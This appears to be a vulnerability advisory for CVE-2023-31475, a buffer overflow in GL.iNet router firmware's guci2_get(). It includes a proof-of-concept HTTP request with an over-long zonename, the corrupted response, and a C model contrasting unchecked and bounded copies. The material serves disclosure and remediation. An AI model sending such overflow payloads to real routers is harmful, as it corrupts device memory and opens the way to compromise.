CVE-2023-31475: CVE-issues/Buffer_Overflow.md at main · gl-inet/CVE-issues
An issue was discovered on GL.iNet devices before 3.216. The function guci2_get() in libglutil.so has a buffer overflow: when an item is requested from a UCI context, the value is copied through a char pointer into a buffer without checking the size of that buffer.
```http
======= REQUEST 1 =======
POST /api/router/timezone/set HTTP/1.1
Host: 192.168.8.1
Authorization: 80dafe40822e4a59b6daabd659617963
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 149

zonename=Asia/D[aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa]

======= RESPONSE 1 =======
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 10
Connection: close
Date: Wed, 04 Jan 2023 00:29:13 GMT
Server: lighttpd/1.4.48

{"code":0}
```
```http
======= REQUEST 2 =======
GET /api/router/timezone/get HTTP/1.1
Host: 192.168.8.1
Authorization: 80dafe40822e4a59b6daabd659617963
Connection: close

======= RESPONSE 2 =======
HTTP/1.1 200 OK
Content-Type: application/json
Expires: Wed, 04 Jan 2023 00:29:29 GMT
Cache-Control: max-age=1
Content-Length: 26750
Connection: close
Date: Wed, 04 Jan 2023 00:29:28 GMT
Server: lighttpd/1.4.48

{
"zonename":"Asia\/D[aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaEET-2EEST,M3.5.5\/0,M10.5.5\/0", // the extra value `EET-2EEST,M3.5.5/0,M10.5.5/0` is appended to zonename because the timezone value was copied into the middle of the zonename buffer, and no null byte is found until the end of the timezone value
"timezone":"EET-2EEST,M3.5.5\/0,M10.5.5\/0",
"autotimezone":true,
"systemtime":"Wed Jan 4 02:29:28 EET 2023",
"timezone_list":[{"zonename":"Africa\/Abidjan","timezone":"GMT0"},...],
"code":0
}
```
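The response above shows the symptom of the unchecked copy: the timezone string appears spliced into the middle of the returned zonename, because the over-long zonename ran into the neighbouring field and the later timezone write supplied the only null byte. The following C model is an added example, not GL.iNet code and not libglutil.so; it assumes a constructed layout of two adjacent 32-byte fields (`ZONE_LEN`, `TZ_LEN`) inside one flat array, and the sample zonename and timezone values are constructed to resemble the request above. It places the unchecked copy pattern described for guci2_get() next to a bounded copy that truncates and always terminates, so the same sequence of writes can be compared.

```c
#include <stdio.h>
#include <string.h>

/* Constructed layout (assumption for this example): two fixed-size fields
 * laid out back to back, as two char arrays in one struct would be.
 * They live in a single flat array so the simulated overflow never leaves
 * a real C object. */
#define ZONE_LEN 32
#define TZ_LEN   32
static char mem[ZONE_LEN + TZ_LEN];
#define ZONENAME_FIELD (mem)
#define TIMEZONE_FIELD (mem + ZONE_LEN)

/* Constructed sample values resembling the request on the page. */
#define SAMPLE_ZONENAME "Asia/D" "aaaaaaaaaa" "aaaaaaaaaa" "aaaaaaaaaa" "aaaaaaaaaa"
#define SAMPLE_TIMEZONE "EET-2EEST,M3.5.5/0,M10.5.5/0"

/* Unchecked copy: the pattern the advisory describes. The destination size is
 * never consulted, so a long value spills into whatever follows the field.
 * (The single guard here only keeps the simulation inside `mem`.) */
static void unchecked_get(char *dst, const char *value) {
    size_t n = strlen(value);
    if (dst + n + 1 > mem + sizeof mem)
        n = (size_t)((mem + sizeof mem) - dst) - 1;
    memcpy(dst, value, n + 1);          /* copies the terminator too */
}

/* Bounded copy: truncate to the field and always write a terminator. */
static void bounded_get(char *dst, size_t dstsz, const char *value) {
    size_t n = strlen(value);
    if (n >= dstsz)
        n = dstsz - 1;
    memcpy(dst, value, n);
    dst[n] = '\0';
}

/* Replays the sequence from the page: store zonename, then timezone, then
 * read zonename back the way the /timezone/get handler would (as a C string).
 * Returns a pointer into the simulated memory. */
const char *simulate(int bounded, const char *zonename, const char *timezone) {
    memset(mem, 0, sizeof mem);
    if (bounded) {
        bounded_get(ZONENAME_FIELD, ZONE_LEN, zonename);
        bounded_get(TIMEZONE_FIELD, TZ_LEN, timezone);
    } else {
        unchecked_get(ZONENAME_FIELD, zonename);
        unchecked_get(TIMEZONE_FIELD, timezone);
    }
    return ZONENAME_FIELD;
}

int main(void) {
    /* Unchecked: the first 32 bytes of the long zonename stay, the rest is
     * overwritten by the timezone write, and strlen() runs on into it. */
    printf("unchecked: %s\n", simulate(0, SAMPLE_ZONENAME, SAMPLE_TIMEZONE));
    /* Bounded: zonename is cut at 31 characters and terminated; the
     * timezone field is untouched by the zonename write. */
    printf("bounded:   %s\n", simulate(1, SAMPLE_ZONENAME, SAMPLE_TIMEZONE));
    return 0;
}
```

The bounded variant is the minimal fix for the copy itself; the server-side check a practitioner would add on top is input validation of `zonename` against the known timezone list (the `timezone_list` the API already returns), so an over-long or malformed name is rejected before any copy happens.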